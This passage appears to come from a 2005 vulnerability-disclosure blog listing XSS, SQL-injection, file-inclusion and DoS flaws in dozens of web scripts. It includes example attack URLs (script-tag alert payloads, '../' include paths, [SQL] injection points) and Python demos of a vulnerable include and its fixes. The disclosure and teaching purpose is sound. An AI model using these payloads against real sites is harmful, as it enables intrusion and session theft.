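    os.mkdir(os.path.join(root, "modes"))
    with open(os.path.join(root, "modes", "upload.php"), "w") as f:
        f.write("<?php /* upload form */ ?>")
    with open(os.path.join(root, "config.php"), "w") as f:
        f.write("<?php $db_pass = 'constructed-secret'; ?>")
    return root


def include_vulnerable(root: str, mode: str) -> str:
    # The bug the advisory describes: the "mode" value becomes part of the included path,
    # so "../config.php" walks out of modes/ and reads the configuration file instead.
    with open(os.path.join(root, "modes", mode)) as f:
        return f.read()


def include_fixed(root: str, mode: str) -> str:
    # Allowlist the legal values first, then confirm the resolved path is still inside
    # modes/ (defence in depth in case the allowlist is later loosened to a pattern).
    if mode not in ALLOWED_MODES:
        raise ValueError(f"unknown mode {mode!r}")
    base = os.path.realpath(os.path.join(root, "modes"))
    target = os.path.realpath(os.path.join(base, mode))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("mode escapes the modes directory")
    with open(target) as f:
        return f.read()


def lfi_demo() -> tuple:
    """Returns (whether the traversal leaked the secret, whether the fix blocked it,
    what the fix returns for a legal mode)."""
    root = build_webroot()
    leaked = include_vulnerable(root, "../config.php")
    try:
        include_fixed(root, "../config.php")
        blocked = False
    except ValueError:
        blocked = True
    return "constructed-secret" in leaked, blocked, include_fixed(root, "upload.php")


if __name__ == "__main__":
    print(lfi_demo())
```

The realpath comparison is what catches symlinks and "..", which a plain string prefix check on the unresolved path would miss.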

    paFileDB Extreme Edition SQL inj

    paFileDB Extreme Edition SQL inj

    Vuln. discovered by : r0t
    Date: 16 dec. 2005
    vendor:http://pafiledb.byethost15.com/
    affected version:RC 5 and prior


    Product Description:

    The core of this script is based on paFileDB 3.1 but with a lot of features (that's why I call it Extreme Edition). These are some of the features: - 4 level sub category - 3 different ways to calculate the filesize of a file (so that the script can run on free servers too) - highly advanced screenshot/thumbnailing settings - download screenshots to your server (if supported) - show thumbnails in the category and viewall view - tons of settings that you can change in the admin panel (no need to edit the source or edit SQL queries by hand) - built-in news management/system page numbers if there are x number of replies - small logging system (for adding/editing/deleting things) - secured comment system - advanced settings for the comments system like br's and smilies. Feel free to test it!! it's FREE


    Vuln. Description:

    paFileDB Extreme Edition contains a flaw that allows remote SQL injection attacks. Input passed to the "newsid" and "id" parameters in "pafiledb.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    examples:

    /pafiledb.php?news=showcontent&newsid=[SQL]
    /pafiledb.php?action=category&id=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    phpXplorer XSS vuln.

    phpXplorer XSS vuln.

    Vuln. discovered by : r0t
    Date: 16 dec. 2005
    vendor:http://www.phpxplorer.org/
    affected version:0.9.12 and prior

    Product Description:

    phpXplorer is a free open source file management system / explorer written in PHP. It enables you to work on a remote file system through a web browser. By default it has got dialogs for editing HTML, PHP, image, Apache, compressed and email files. Its modular design makes it easy to build your own filetypes, property sheets, views and themes. phpXplorers permission manager enables you to restrict the access to the shared file system for multiple users in a detailed way.

    Vuln. Description:

    phpXplorer contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the address bar field isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    ScareCrow Message Board XSS vuln.

    ScareCrow Message Board XSS vuln.

    Vuln. discovered by : r0t
    Date: 16 dec. 2005
    vendor:http://scarecrow.sourceforge.net/
    affected version:2.13 and prior

    Product Description:

    ScareCrow is a fully featured and free message board system. It is meant to be both powerful and easy to use, for the users and the administrator. Released under the GPL License, ScareCrow hopes to gather a great community of users and developers to make it the best message board in existence.

    Vuln. Description:

    ScareCrow Message Board contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "forum" and "user" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.



    examples:

    /forum.cgi?forum=[XSS]
    /profile.cgi?action=view&user=[XSS]
    /post.cgi?action=new&forum=[XSS]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Binary Board System XSS vuln.

    Binary Board System XSS vuln.

    Vuln. discovered by : r0t
    Date: 16 dec. 2005
    vendor:http://binary-concepts.com/cgi/bbs/
    affected version:0.2.5 and prior

    Product Description:

    The Binary Board System (BBS) is a complete Perl/SQL bulletin board solution. Its features include a complete user login system, a multi-board interface with easy administration and categorization, and ease of customization that sets it apart from the rest.



    Vuln. Description:

    Binary Board System contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "inreplyto", "article", "branch", "board" and "user" parameters and to the search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.



    examples:

    /reply.pl?board=1&article=81&inreplyto=[XSS]&[member]=yes

    /reply.pl?board=1&article=[XSS]&inreplyto=0&[member]=yes

    /reply.pl?board=[XSS]&article=81&inreplyto=&[member]=yes

    /stats.pl?action=branchdetail&branch=[XSS]&view=posts&[member]=yes

    /stats.pl?action=boarddetail&board=[XSS]&view=posts&[member]=yes

    /stats.pl?action=userdetail&user=[XSS]&view=posts&[member]=yes

    /toc.pl?board=[XSS]&[member]=yes


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Thursday, December 15, 2005

    SiteNet BBS XSS vuln

    SiteNet BBS XSS vuln
    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:www.focalmedia.net/sitenetbbs.html
    affected version:2.0 and prior


    Product Description:

    Fast, customizable, moderation, upload of user images, user profiles, optional user registration, emoticons, e-mail notification and many other features. Also comes with extensive admin and moderator admin panels to manage all aspects of your forums. Also included is a special setup interface to ensure easy installation.


    Vuln.description:

    SiteNet BBS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "pg", "tid", "cid" and "fid" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    examples:

    /netboardr.cgi?fid=929&cid=926&tid=965&pg=[XSS]
    /netboardr.cgi?fid=929&cid=926&tid=[XSS]
    /netboardr.cgi?fid=929&cid=[XSS]
    /netboardr.cgi?fid=[XSS]
    /search.cgi?cid=[XSS]



    Solution:
    Edit the source code to ensure that input is properly sanitised.

    bbBoard v2 XSS vuln.

    bbBoard v2 XSS vuln.

    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:http://www.bbv2.com/
    affected version: v2.56 and prior

    Product Description:

    bbBoard v2 is the best message board software, guaranteed*! bbBoard is completely customisable and code-modifiable, in various languages. Because of bbBoard's clean interface and auto-installation and updation features, it makes it an uncomplicated tool for even the novice computer user! bbBoard can be accessed using a cellular phone (WAP), NNTP, Telnet, and MSN Messenger. And you still can interact by posting, sending PMs, using the Chat feature, visiting the Calendar or posting a webcam recording.

    Vuln. Description:

    bbBoard v2 contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    DCForum XSS vuln.

    DCForum XSS vuln.

    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:www.dcscripts.com/dcforum.shtml
    affected version: 6.25 and prior



    Product Description:

    DCForum a complete bulletin board system from DCScripts. Its main features include: Multiple Forums, Efficient implementation, fast performance, Clean and intuitive user interface, Easy customization, Supports both Fully threaded and linear style discussion, Three levels of forum types - public, protected, and private, Three-level navigation - Lobby, Main, and Topic, Topics stored as both text-delimited database file and html file, and much more.

    Vuln.description:

    DCForum contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "page" parameter and to the search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    example:

    /dcboard.php?az=show_topic&forum=46&topic_id=2215&mesg_id=2215&page=[XSS]



    Solution:
    Edit the source code to ensure that input is properly sanitised.

    AlmondSoft Products SQL inj.

    AlmondSoft Products SQL inj.

    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:http://www.almondsoft.com/
    affected products: Almond Classifieds 5.02 (Pro, Standard and E-Commerce editions) and Almond Personals 4.05 and prior versions.

    AlmondSoft info:

    We offer custom CGI/Perl/MySQL, PHP/MySQL programming for your needs, developing CGI scripts, scripts for classified ads, custom solutions for dynamic web pages.


    Vuln.description:

    AlmondSoft products contain a flaw that allows remote SQL injection attacks. Input passed to the "id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Atlant Pro XSS vuln.

    Atlant Pro XSS vuln.

    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:http://www.atlantpro.com/
    affected version: 8.09 and prior


    Product Description:

    Atlant Pro can work with plain text or MySQL databases. Script supports fee based membership sign up with real-time credit card processing. Some classifieds abilities (submitting ads, sending privacy mail to ad owners, viewing ads ) can be specified for using only by members. Before ads appear in the index admin can optionally moderate ad submissions. Users can place ads with many photos, preview photo and multimedia file. Password protected editing, renewing, deleting of ads. Powerful database searching capabilities with many criteria. Users can subscribe for mail list with special criteria. HTML Templates. Admin. can specify high priority level and comments for some ads. Anti-Spamming Features. For each category a set of ad fields (such as price, city, age, area, etc.) can be specified. Try the free version to see how it works !


    Vuln. Description:

    Atlant Pro contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "before" and "ct" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    examples:

    /atl.cgi?ct=a8&md=search&brf=&before=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /atl.cgi?ct=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    Solution:
    Edit the source code to ensure that input is properly sanitised.
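The payload in the Atlant Pro URLs above, and in the AtlantForum, eDatCat, ECW-Cart, ECTOOLS, PPCal and ClickCartPro examples further down, decodes to "><script>alert('r0t')</script>: the leading quote and angle bracket close the attribute the value is echoed into, and the rest is a fresh script tag. The block below is an added example, not code from r0t or from any vendor; Python stands in for the Perl CGI, and the search form template that echoes "before" into a value="..." attribute is an assumption. It shows the unescaped reflection, the escaped form, and the check used to tell the two apart from a response body.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed request: the first Atlant Pro POC from the advisory above.
POC_URL = "/atl.cgi?ct=a8&md=search&brf=&before=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E"
PAYLOAD = "\"><script>alert('r0t')</script>"


def params_from_url(url: str) -> dict:
    """Decode the query string the way a CGI script sees it (first value per name)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: values[0] for name, values in query.items()}


def render_search_form_vulnerable(params: dict) -> str:
    # Assumed template: the search form echoes the previous "before" value back into a
    # quoted attribute without escaping, which is the flaw the advisory describes.
    before = params.get("before", "")
    return f'<form action="/atl.cgi"><input type="text" name="before" value="{before}"></form>'


def render_search_form_fixed(params: dict) -> str:
    # Same template; html.escape(quote=True) turns " into &quot; and < > into &lt; &gt;,
    # so the value can neither close the attribute nor start a tag.
    before = html.escape(params.get("before", ""), quote=True)
    return f'<form action="/atl.cgi"><input type="text" name="before" value="{before}"></form>'


def reflected_unescaped(page: str, value: str) -> bool:
    """The check behind a reflected-XSS finding: the decoded payload appears verbatim,
    quote and angle brackets intact, somewhere in the response body."""
    return value in page


def check_url(render, url: str) -> bool:
    params = params_from_url(url)
    return reflected_unescaped(render(params), params["before"])


if __name__ == "__main__":
    print("vulnerable:", check_url(render_search_form_vulnerable, POC_URL))
    print("fixed:     ", check_url(render_search_form_fixed, POC_URL))
```

The verbatim-substring check is deliberately strict: a reflection that only survives with the quote stripped or the brackets entity-encoded is not exploitable in an attribute context, which is why the POCs on this page all carry the leading %22%3E rather than a bare script tag.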

    AtlantForum XSS vuln.

    AtlantForum XSS vuln.

    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:www.atlantpro.com/atlfm.html
    affected version: 4.02 and prior; AtlantForum Lite and AtlantForum Pro may have the same vuln.


    Product Description:

    Message board featuring: Free or fee based membership subscribing, users can post/edit/delete/reply messages with photos and multimedia files; Search messages with keywords, photos, topics, posted by a user; Mail Lists; Script can work with text based or MySQL databases.

    Vuln. Description:

    AtlantForum contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "sch_allsubct", "before" and "ct" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    examples:

    /atl.cgi?ct=&md=search&brf=&before=&sch_allsubct=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /atl.cgi?ct=&md=search&brf=&before=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /atl.cgi?ct=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    CommerceSQL XSS vuln.

    CommerceSQL XSS vuln.

    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:http://commercesql.com/
    affected version:1.0 and prior

    Product Description:

    CommerceSQL is a MySQL-driven shopping cart program. Some of its main features include: Inventory Control, Customer Registration, Recommend Similar Items Purchased, and more.

    Vuln. Description:

    CommerceSQL contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    eDatCat XSS vuln.

    eDatCat XSS vuln.

    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:http://www.edatcat.com/
    affected version: v3.0 and prior

    Product Description:

    eDatCat is a fully customizable database and shopping cart system. Features include: real-time UPS shipping, browser-based administration, retail & wholesale pricing, customer accounts, order tracking, powerful inventory controls, wish list, discount support, support for AuthorizeNet/CyberCash/VeriSign and others, completely customizable appearance, and more. eDatCat allows you to design your shopping cart around your site- not your site around your shopping cart. Create a fully tailored, seamless, and powerful e-commerce environment with eDatCat. A fully-functional 10-day trial available for download.

    Vuln. Description:

    eDatCat contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "user_action" parameter in "EDCstore.pl" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:
    /EDCstore.pl?user_action=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    ECW-Cart XSS vuln.

    ECW-Cart XSS vuln.

    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:www.soft4e.com/cart.html
    affected version:2.03 and prior

    Product Description:

    ECW-Cart - simple for use featured shopping cart with ability to use MS Excel or Access format for database. Users can calculate progressive discount for chosen products list. Search for keywords and prices. Merchant can prepare list of products for on-line selling by using MS Excel or Access, then easy upload prepared database into Web Server via any FTP client. Admin can specify in config file groups of products, order features, discounts for different order prices.

    Vuln. Description:


    ECW-Cart contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "kword", "max", "min", "comp" and "f" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /index.cgi?c=search&s=ok&id=191&kword=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&f=r0t+XSS&comp=0&min=&max=

    /index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=0&min=&max=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E

    /index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=0&min=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E

    /index.cgi?c=search&s=ok&id=191&kword=&f=r0t+XSS&comp=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E

    /index.cgi?c=search&s=ok&id=191&kword=&f=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E

    Solution:
    Edit the source code to ensure that input is properly sanitised.


    P.S.: change "r0t+XSS" to an existing parameter value.

    ECTOOLS - Onlineshop XSS

    ECTOOLS - Onlineshop XSS

    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:http://www.ectools.de/
    affected version:1.0 and prior

    Product Description:

    ECTOOLS Onlineshop contains a trackingsystem, to let your customers watch their order status. Easy to set up, easy data-upload, easy picture-upload easy administration and many other features like extended sales-stats and much more. This is a german version with only one template to modify to fit to the design of your homepage


    Vuln. Description:

    ECTOOLS Onlineshop contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "product", "category" and "uid" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /cart.cgi?action=link&product=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /cart.cgi?action=search&category=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /cart.cgi?action=link&product=33&uid=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    PPCal Shopping Cart XSS

    PPCal Shopping Cart XSS

    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:http://www.paypalshoppingcart.org/
    affected version:3.3.0 and prior


    Product Description:

    PPCal Shopping Cart allows integration and automation of PayPal payments on your web site. Applications are numerous. PPCal can be easily customized to serve any purpose, associated with PayPal payment.

    Vuln. Description:

    PPCal Shopping Cart contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "stop" and "user" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    examples:
    /ppcal.cgi?action=shop&user=8001&start=21&stop=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /ppcal.cgi?action=shop&user=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    PlexCart X3 SQL inj. vuln.

    PlexCart X3 SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:www.plexum.com/ecommerce/shopping_cart/
    affected version:3.0 and prior

    Product Description:
    Your complete eCommerce and shopping cart solution for online web stores of all sizes. PLEXCART X3 makes the management of your online store easier – so you have more time to devote to building your business – instead of spending all of your time running it!

    Vuln. Description:

    PlexCart X3 contains a flaw that allows remote SQL injection attacks. Input passed to all parameters of the product search module isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    DomainCart XSS

    DomainCart XSS

    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:www.zaygo.com/domain-shopping-cart/domaincart/
    affected version:2.0 and prior

    Product Description:

    Zaygo DomainCart is a complete domain name search, order and registration solution. It allows your customers to search for domain names in over 100 top level domains, including .tv, .md and .ws domains. Domains can be added to a shopping cart, with automatic price and tax calculation. You can set separate prices for different domains, and allow registration for different numbers of years. After ordering, DomainCart can send customizable emails to you and your customers, with order details. DomainCart has easy web-based admin and installation, and is completely customizable using downloadable themes or your own HTML templates. DomainCart can be upgraded with plugins for automatic domain registration, credit card providers, selling hosting plans, domain transfers, and search wizards.

    Vuln. Description:

    DomainCart contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    HostingCart XSS

    HostingCart XSS

    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:www.zaygo.com/hosting-tools/hostingcart/
    affected version:2.0 and prior

    Product Description:

    Zaygo HostingCart is a complete shopping cart, designed especially for ISPs and hosting companies. It includes an integrated domain name search. Customers can buy hosting plans on their own or associated with a specific domain name. You can define hosting plans with names and prices, and choose prices for domain name registration in different TLDs for 1-10 years. Features: transfer domain function, with ownership check; customisable order emails to you and purchasers; automatic price and tax calculation; easy web-based admin and installation; Free downloadable HTML themes or design your own look using simple HTML templates; and upgradable with plugins for automatic domain registration, credit card processing, domain name wizards, and faster searching.


    Vuln. Description:

    HostingCart contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search module parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    StaticStore Search Engine Friendly E-Commerce XSS

    StaticStore Search Engine Friendly E-Commerce XSS

    Vuln. discovered by : r0t
    Date: 15 dec. 2005
    vendor:www.staticstore.com
    affected version:1.189A and prior

    Product Description:

    StaticStore is a full store and online catalog builder complete with a browser based store manager for categorizing, adding, copying, moving, editing, and deleting products from your product database. Static search engine friendly HTML pages are then created from the MySQL product database. StaticStore is a robust store and online catalog builder and is able to categorize and build hundreds of product categories and thousands of static search engine friendly HTML product pages. StaticStore will allow you to categorize and start adding products immediately upon installation. StaticStore is truly the most "search engine friendly" and "user friendly" store and online catalog builder available in the market today.



    Vuln. Description:

    StaticStore contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search parameters of "search.cgi" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Wednesday, December 14, 2005

    ClickCartPro (CCP) XSS vuln.

    ClickCartPro (CCP) XSS vuln.

    Vuln. discovered by : r0t
    Date: 14 dec. 2005
    vendor:http://www.clickcartpro.com/
    affected version:5.1 and prior

    Product Description:

    CCP is a full featured shopping cart engine that will install on virtually any webserver, and does not require root access or special modules. The entire software package uses SQL and a relational database model, which allows tie-ins to many RDBMS (MySQL, PostgreSQL, Microsoft SQL Server, etc.). It runs out of the box in CSV mode. 100% of the front-end and web based administrator is configurable using its 200+ functions. Features: multi-level categories, product downloads, data import/export, easy product option and relationship management, dynamic form and page generation, easy site layout editing, file uploads, discounts, order tracking, keyword search, flexible shipping with UPS integration or default and custom methods. Integrated with 28 payment processors including PayPal. Offline processing included.


    Vuln. Description:

    ClickCartPro contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "affl" parameter in "cp-app.cgi" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /cp-app.cgi?usr=51H4515590&rnd=577308&rrc=N&affl=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    The CITY Shop XSS vuln.

    The CITY Shop XSS vuln.

    Vuln. discovered by : r0t
    Date: 14 dec. 2005
    vendor:http://www.nightmedia.net/shop/
    affected version:1.3 and prior


    Product Description:

    The CITY Shop is one of the most advanced, and certainly the most flexible open-source shopping cart available on the market. The CITY Shop has been designed with utmost flexibility in mind. Its object-oriented architecture allows it to perform exceptionally on any platform that provides Perl.
    The CITY Shop runs under normal Perl, mod_perl, and any other scripting accelerators available. We value the user input regarding features and improvements, and we implement most of them in real time, making the new development easily available for everybody.


    Vuln. Description:

    The CITY Shop contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the search module's parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    PDEstore XSS vuln.


    Vuln. discovered by : r0t
    Date: 14 dec. 2005
    vendor:www.smart-choices.org/docs/pdestore.html
    affected version:1.8 and prior

    Product Description:
    PDEstore Ver. 1.8 is an easy to install, easy to use online shopping cart CGI script and is easily installed via FTP. PDEstore makes configuring your store calculations easy to update and change as needed. PDEstore does not use complex modules to complicate consistent, error-free operation. Easy web-based management scripts make it easy to maintain your store products. PDEstore simplifies the process of selling products from your web site.

    Vuln. Description:

    PDEstore contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the search module parameter and to the "product" and "cart_id" parameters in "pdestore.cgi" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:

    /pdestore.cgi?product=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /pdestore.cgi?product=jewelry&cart_id=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    ezDatabase vuln.


    Vuln. discovered by : r0t
    Date: 14 dec. 2005
    vendor:http://www.ezdatabase.org/
    affected version:2.1.2 and prior

    Product Description:

    A web based program for creating online databases, written in PHP and MySQL. An Admin CP allows you to create databases, fields, categories, users, user groups and customize your databases using powerful templates + settings. Visitors can access your databases via the Visitor File. Export a database, create search forms, view database statistics, approve visitor uploads, implement user registration, use language files, and add built-in extras to your databases such as comments, ratings, and automatic file download logging. 30 day money back guarantee.

    Vuln. Description:

    1. Input passed to the "p" parameter isn't properly verified before it is used to include files. This can be exploited to include arbitrary files from local resources.

    2. Input passed to the "db_id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    3. Input passed to the "cat_id" parameter isn't properly sanitised before being returned to the user. This can be exploited to obtain the full installation path.


    examples:

    Local file include.

    /index.php?p=../Local file

    SQL injection.

    /index.php?p=getcat&db_id=[SQL]

    Directory Traversal

    /index.php?p=getcat&db_id=1&cat_id=[CODE]



    Solution:
    Edit the source code to ensure that input is properly sanitised.

    WikkaWiki XSS vuln.


    Vuln. discovered by : r0t
    Date: 14 dec. 2005
    vendor:http://wikka.jsnx.com/
    affected version:1.1.6.0 and prior

    Product Description:
    WikkaWiki is a lightweight and flexible wiki engine allowing easy management of Websites, in particular collective Web-based projects: it provides an intuitive interface for modifying page content, tracking and comparing revisions made by single users, and setting user access privileges. It features W3 compliant XHTML and CSS output, several text formatting options, categories, a GUI for editing pages, support for images, tables, Flash objects, RSS feeds, FreeMind maps, advanced Access Control List management, referrers management, and text search functions. Designed for easy customizability, it aims at keeping its core as light as possible while maintaining an architecture that supports extensibility through plugin modules.

    Vuln. Description:

    WikkaWiki contains a flaw that allows a remote cross-site scripting attack. This flaw exists because input passed to the "phrase" parameter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:
    /TextSearch?phrase=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    ProjectForum 4.7.0 vuln.


    Vuln. discovered by : r0t
    Date: 14 dec. 2005
    vendor:http://www.projectforum.com/pf/
    affected version:4.7.0 and prior


    Product Description:

    ProjectForum provides a professional and easy-to-use web-based focus for your team's work and collaboration, helping to move documents and projects forward fast. Its flexible wiki-style forums fill the gap between the scattered flurry of email and the time and expense of meetings or teleconferences. Build a project site or intranet where everyone can actively and directly contribute. Downloadable and hosted versions available.


    Vuln. Description:

    1. Denial of Service attack
    A boundary error in handling the input passed to the "pageid" parameter can be exploited to crash the service by sending a crafted POST request, making it usable for a DoS attack.


    2. XSS
    Missing input validation in various pages and error messages can be exploited to conduct Cross-Site Scripting attacks by inserting arbitrary HTML or script code, which will be executed in a user's browser session when viewed.


    examples:

    /admin/versions.html?pageid=[CODE]

    /admin/adminsignin.html?fwd=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /support/admin/newpage.html?originalpageid=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E



    Solution:
    1.
    Restrict access to the service (default port 3455/tcp) to ensure that only trusted IP addresses can connect.

    Filter malicious characters and character sequences in a HTTP proxy.

    2.
    Edit the source code to ensure that input is properly sanitised.

    DreamPoll SQL inj.


    Vuln. discovered by : r0t
    Date: 14 dec. 2005
    vendor:http://dreamlevels.com/dreampoll.php
    affected version: 3.0 final and prior

    Product Description:
    DreamPoll is an enhanced version of Advanced Poll Builder for webmasters who handle the medium/big websites. It is extremely HANDY TO USE, have nice admin panel, 3-STEPS VISUAL WIZARD to create the POLL and customize the Design. It has all the features of Advanced Poll Builder 1.2, like "COLOR PICKER/Wizard", "Prevent Multiple Votes per IP/ Computer", "Results Statistics" and more [click "visit" for full features list] + 2 more new very useful ones: 1) Default Poll – this allows you to easily set the [default poll]. If you have a lot of html or other pages on your site where you want to place the same poll and want to easily switch between the existent polls so it will automatically starts showing current default poll on all the pages, this feature will save your time. You do not need to change the html code every time you want to show another poll on your pages; 2) Now the results can be shown right on the poll box.


    Vuln. Description:
    DreamPoll contains a flaw that allows remote SQL injection attacks. Input passed to the "id" parameter in "view_Results.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /view_Results.php?id=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    WHMCompleteSolution XSS vuln.

    Vuln. discovered by : r0t
